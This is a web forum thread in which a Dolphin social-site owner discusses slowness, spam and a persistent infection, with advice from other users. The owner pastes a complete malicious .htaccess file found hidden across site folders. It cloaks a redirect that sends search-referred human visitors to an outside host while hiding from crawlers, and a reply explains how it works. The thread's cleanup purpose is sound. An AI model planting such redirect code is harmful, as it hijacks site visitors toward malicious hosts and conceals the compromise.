Is it time to start over???

Well, I'm now over 255,000 members.  This isn't bad considering the majority of my visitors come only for the chat, which is an integrated flashcoms chat script that does not require them to register.  Also a few hundred visitors leave my site each day by clicking on ads.

Anyhow, my site has become quite slow despite the optimized $300/month dedicated server I'm on (I've even added litespeed to make it faster).  It seems it just gets slower and slower every day.  Add this to the fact that my site has been infected with malicious code over the last few months that cannot be found.  What is a guy to do?

Perhaps it's time to start over.  I am seriously considering starting with a fresh install of Dolphin.  I'm honestly not posting this so people can tell me all the reasons why I shouldn't.  I'm just wondering if I've actually reached the MySQL limits of this script, and have no choice but to start over.  At least doing so would remove all instances of malicious code.

Your site is loaded with spam content.  Whatever you do, you need to do a much better job of getting that under control.  Probably a good percentage of those 255K 'members', are spammers.  Perhaps some database pruning would help.

Case and point: http://www.ustillup.com/m/events/browse/tag/oakley%20sunglasses

Have you looked at the size of your database lately?  I'd bet it's well into the Gigabyte range.  Excuse the bluntness, but you need to get off your ass and get busy deleting all the useless crap content from your site.

You absolutely have a point.  Does database pruning in admin actually work?  I really wonder.  

As for all the spam, I will certainly get on that.  

Check the size of your database... I'm dying to find out.  If I were you, I'd uninstall & reinstall  the events and groups module.  I don't think you have a single legit event or group on your site. 

I find this rather amusing: http://www.ustillup.com/m/store/browse/recent

You have 31,000 store items, that appear to be nothing but spam.  Dude.... you have seriously been asleep at the wheel.  You really should consider just allowing joins from the US only, and use Maxmind's proxy detection service to stop people from joining through US based anonymous proxy servers.  You'll end up with a lot less members, but your site will be a lot cleaner.  Ask yourself, "Do I really need members that can't read or write English?".

Okay, so I've removed a bunch of my modules (including videos, spy, wall, store, sounds, polls, news, groups, files, events, feedback, etc.)

I'm checking my database now that I've removed all these modules (I will install some of them again later), and my database is:  10578.45 MB

That's huge.  I'd suggest you look at all the individual table sizes, and see which ones are taking up the most space.  Some of those tables may be storing things you don't need anymore.

An idea would be to set a cron that will remove posts, members, media, etc that has been inactive for X amount of days. (Eg 365 days)

We'd be interested to have a look. Please email AlexT at alex.trofimov@boonex.com with your details, if you don't mind us examining your setup, database and server load. Often a few small tweaks make a massive difference, and wed be happy to do it to be able to optimise Dolphin better.

His site won't open for me, AVG lock's me out.

Thanks Andrew!!  I would really appreciate that.

I have just discovered and removed a few hundred .htaccess files that were hidden in folders within folders within folders....

Do you think this could be the "Phoenix Exploit Kit"???

Here is the contents for those of you too scared to open the .htaccess file  (JK):

# exgocgkctswo

RewriteEngine On

RewriteCond %{REQUEST_METHOD}   ^GET$

RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]

RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]

RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]

RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$

RewriteCond %{HTTPS}            ^off$

RewriteRule ^(.*)$   http://thousandmilitary.com/cgi-bin/r.cgi?p=10003&i=26433fe8&j=333&m=9262a65b6c099ed80831778122dc14e8&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]

# exgocgkctswo

Yea, looks like that could be "Phoenix Exploit Kit" and alot more.  Those were some how injected into your .htaccess files or added others which is why you have issues with redirects, virus, avg, etc...

Hope you have changed all password to cpanel and such. Also, make sure the computer you use to access your cpanel/ftp is clean. I see alot of issues with infected computers that add or inject into index and htaccess files.

[Edit] Yea, I wasn't opening the attached file.. lol

That htaccess redirects all human visitors to the spam site at the bottom but let's the search engines see your actual site so they don't red flag it. Here's a site with a little script to help clean them all up:

http://alvinjiang.blogspot.com/2010/09/htaccess-file-hijacked-how-to-remove.html